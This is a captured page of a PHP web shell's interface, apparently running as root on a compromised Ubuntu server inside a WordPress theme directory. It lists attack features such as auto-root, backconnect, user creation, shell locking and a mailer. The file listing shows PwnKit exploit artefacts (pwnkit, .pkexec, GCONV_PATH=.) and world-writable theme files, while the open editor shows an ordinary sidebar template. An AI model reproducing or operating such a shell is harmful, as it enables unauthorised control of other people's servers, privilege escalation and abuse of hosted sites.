Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
inselect /
wp-content /
themes /
phlox /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auxin
[ DIR ]
drwxrwxrwx
auxin-content
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
README.txt
53.08
KB
-rwxrwxrwx
archive.php
1.61
KB
-rwxrwxrwx
comments.php
5.27
KB
-rwxrwxrwx
footer.php
436
B
-rwxrwxrwx
functions.php
816
B
-rwxrwxrwx
header.php
1.09
KB
-rwxrwxrwx
index.php
1.81
KB
-rwxrwxrwx
package-lock.json
685.47
KB
-rwxrwxrwx
page.php
1010
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
rtl.css
59.56
KB
-rwxrwxrwx
screenshot.png
1.46
MB
-rwxrwxrwx
search.php
864
B
-rwxrwxrwx
searchform.php
552
B
-rwxrwxrwx
sidebar-footer.php
3.22
KB
-rwxrwxrwx
sidebar-primary.php
3.42
KB
-rwxrwxrwx
sidebar-secondary.php
1.91
KB
-rwxrwxrwx
sidebar.php
193
B
-rwxrwxrwx
single.php
1.61
KB
-rwxrwxrwx
style.css
1.69
KB
-rwxrwxrwx
taxonomy.php
1016
B
-rwxrwxrwx
wpml-config.xml
2.53
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-primary.php
<?php /** * Primary sidebar * The sidebar widget area is triggered if any of the areas have widgets. * * * @package Auxin * @author averta (c) 2014-2022 * @link http://averta.net */ if( is_404() ){ return; } global $post; // if no result if( ( empty( $post ) || is_search() ) && ! auxin_is_wc_product_archive() ) { ?> <aside class="aux-sidebar aux-sidebar-primary"> <div class="sidebar-inner"> <div class="sidebar-content"> <?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'auxin_sidebar_primary' ) || is_active_sidebar( 'auxin-search-sidebar-widget-area' ) ) { ?> <div class="aux-widget-area"> <?php if( is_active_sidebar( 'auxin-search-sidebar-widget-area' ) ){ dynamic_sidebar( 'auxin-search-sidebar-widget-area' ); } elseif( current_user_can( 'edit_theme_options' ) ) { echo '<div>' . esc_html__('Search widget area is empty.', 'phlox' ) . '</div>'; } ?> </div> <?php } ?> </div> </div><!-- end sidebar wrapper --> </aside><!-- end siderbar --> <?php return; } // ----------------------------------------------------------------------------- if( auxin_has_sidebar( $post ) || is_customize_preview() ) { ?> <aside class="aux-sidebar aux-sidebar-primary"> <div class="sidebar-inner"> <div class="sidebar-content"> <?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'auxin_sidebar_primary' ) ) { if( is_active_sidebar( 'auxin-global-primary-sidebar-widget-area' ) ){ echo '<div class="aux-widget-area">'; dynamic_sidebar( 'auxin-global-primary-sidebar-widget-area' ); echo '</div>'; } // get page template name $page_template_name = get_post_meta( $post->ID, '_wp_page_template', TRUE ); // if the current page is a blog page if ( ( $post->post_type == 'post' || strpos( $page_template_name, 'blog' ) !== false ) && is_active_sidebar( 'auxin-blog-primary-sidebar-widget-area' ) ) { echo '<div class="aux-widget-area">'; if( is_active_sidebar( 'auxin-blog-primary-sidebar-widget-area' ) ){ dynamic_sidebar( 'auxin-blog-primary-sidebar-widget-area' ); } echo '</div>'; } elseif ( function_exists('is_shop') && is_shop() ) { echo '<div class="aux-widget-area">'; if( is_active_sidebar( 'auxin-shop-sidebar-widget-area' ) ){ dynamic_sidebar( 'auxin-shop-sidebar-widget-area' ); } echo '</div>'; } elseif( is_active_sidebar( 'auxin-pages-primary-sidebar-widget-area' ) ){ echo '<div class="aux-widget-area">'; if( is_active_sidebar( 'auxin-pages-primary-sidebar-widget-area' ) ){ dynamic_sidebar( 'auxin-pages-primary-sidebar-widget-area' ); } echo '</div>'; } } ?> </div><!-- end sidebar-content --> </div><!-- end sidebar-inner --> </aside><!-- end primary siderbar --> <?php }
Close